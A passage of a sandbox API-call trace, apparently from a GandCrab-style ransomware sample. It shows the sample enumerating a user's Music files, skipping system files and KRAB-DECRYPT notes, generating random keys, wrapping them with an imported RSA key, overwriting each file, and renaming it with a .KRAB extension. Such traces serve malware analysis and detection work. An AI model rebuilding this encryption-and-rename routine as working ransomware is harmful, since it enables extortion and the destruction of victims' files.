(lpString1="Zyl8NkUlADcyx.wav", lpString2="desktop.ini") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="autorun.inf") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="ntuser.dat") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="iconcache.db") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="bootsect.bak") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="boot.ini") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="ntuser.dat.log") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="thumbs.db") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="ntldr") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="NTDETECT.COM") returned 1 [0094.600] lstrcmpiW (lpString1="Zyl8NkUlADcyx.wav", lpString2="Bootfont.bin") returned 1 [0094.600] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.601] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0094.601] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.602] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.602] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.602] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0094.602] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.602] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.602] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0094.603] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.603] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.604] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.604] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0094.604] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0094.604] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.604] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011458) returned 1 [0094.604] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0094.605] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.605] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.605] GetLastError () returned 0x0 [0094.605] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.605] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0094.605] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10113d0) returned 1 [0094.606] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd7a0) returned 1 [0094.606] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0094.606] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0094.606] GetLastError () returned 0x0 [0094.606] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.606] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0094.606] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\zyl8nkuladcyx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.607] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.607] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.607] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xd8f9, lpOverlapped=0x0) returned 1 [0094.621] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff2707, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.621] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd8f9, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xd8f9, lpOverlapped=0x0) returned 1 [0094.621] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0094.622] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.625] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.626] CloseHandle (hObject=0x778) returned 1 [0094.626] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.626] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\zyl8nkuladcyx.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\zyl8nkuladcyx.wav.krab")) returned 1 [0094.627] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.627] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0094.628] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0094.628] CloseHandle (hObject=0x3a8) returned 1 [0094.628] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0094.628] lstrcmpW (lpString1="YBmR3c0F8Rck.m4a", lpString2=".") returned 1 [0094.628] lstrcmpW (lpString1="YBmR3c0F8Rck.m4a", lpString2="..") returned 1 [0094.628] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\", lpString2="YBmR3c0F8Rck.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a" [0094.628] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.628] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a.KRAB") returned 58 [0094.628] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a") returned 53 [0094.628] lstrlenW (lpString=".m4a") returned 4 [0094.628] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.629] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0094.629] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.629] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a") returned 53 [0094.629] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a") returned 53 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="desktop.ini") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="autorun.inf") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="ntuser.dat") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="iconcache.db") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="bootsect.bak") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="boot.ini") returned 1 [0094.629] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="ntuser.dat.log") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="thumbs.db") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="KRAB-DECRYPT.html") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="ntldr") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="NTDETECT.COM") returned 1 [0094.630] lstrcmpiW (lpString1="YBmR3c0F8Rck.m4a", lpString2="Bootfont.bin") returned 1 [0094.630] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.630] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010e80) returned 1 [0094.631] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.631] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.631] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.631] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0094.631] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0094.631] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.632] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0094.632] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.633] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.633] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.633] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0094.633] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.633] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.634] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10111b0) returned 1 [0094.635] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0094.635] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0094.635] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0094.635] GetLastError () returned 0x0 [0094.635] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.636] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.636] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0094.636] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd7a0) returned 1 [0094.636] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0094.636] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0094.636] GetLastError () returned 0x0 [0094.636] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.637] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0094.637] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\ybmr3c0f8rck.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0094.637] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.638] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.638] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xd19b, lpOverlapped=0x0) returned 1 [0094.652] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff2e65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.652] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd19b, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xd19b, lpOverlapped=0x0) returned 1 [0094.652] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0094.652] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.656] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.656] CloseHandle (hObject=0x3a8) returned 1 [0094.661] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.661] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\ybmr3c0f8rck.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\YBmR3c0F8Rck.m4a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\ybmr3c0f8rck.m4a.krab")) returned 1 [0094.662] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.663] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0094.663] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0094.663] CloseHandle (hObject=0x434) returned 1 [0094.663] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.663] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.663] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.663] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock" [0094.663] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.663] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 56 [0094.664] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\d2ca4a08d2ca4dee3d.lock") returned 51 [0094.664] lstrlenW (lpString=".lock") returned 5 [0094.664] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.664] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.664] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.664] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.665] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.665] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0094.665] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0094.665] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini" [0094.665] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.665] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini.KRAB") returned 44 [0094.665] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0094.665] lstrlenW (lpString=".ini") returned 4 [0094.665] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.666] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0094.666] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0094.666] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0094.666] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0094.666] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.666] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.666] lstrcmpW (lpString1="Gw2dlbXFcR.m4a", lpString2=".") returned 1 [0094.666] lstrcmpW (lpString1="Gw2dlbXFcR.m4a", lpString2="..") returned 1 [0094.666] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="Gw2dlbXFcR.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a" [0094.667] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.667] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a.KRAB") returned 47 [0094.667] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a") returned 42 [0094.667] lstrlenW (lpString=".m4a") returned 4 [0094.667] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.667] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".m4a ") returned 5 [0094.667] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.668] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a") returned 42 [0094.668] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\Gw2dlbXFcR.m4a") returned 42 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="desktop.ini") returned 1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="autorun.inf") returned 1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="ntuser.dat") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="iconcache.db") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="bootsect.bak") returned 1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="boot.ini") returned 1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="ntuser.dat.log") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="thumbs.db") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="ntldr") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="NTDETECT.COM") returned -1 [0094.668] lstrcmpiW (lpString1="Gw2dlbXFcR.m4a", lpString2="Bootfont.bin") returned 1 [0094.668] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.668] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0094.669] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.669] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.669] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.670] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0094.670] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.670] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.670] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10110a0) returned 1 [0094.670] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.671] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.671] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.671] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0094.671] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0094.671] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.671] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0094.672] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0094.672] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0094.672] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0094.672] GetLastError () returned 0x0 [0094.672] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0094.672] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.672] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0094.673] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0094.673] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 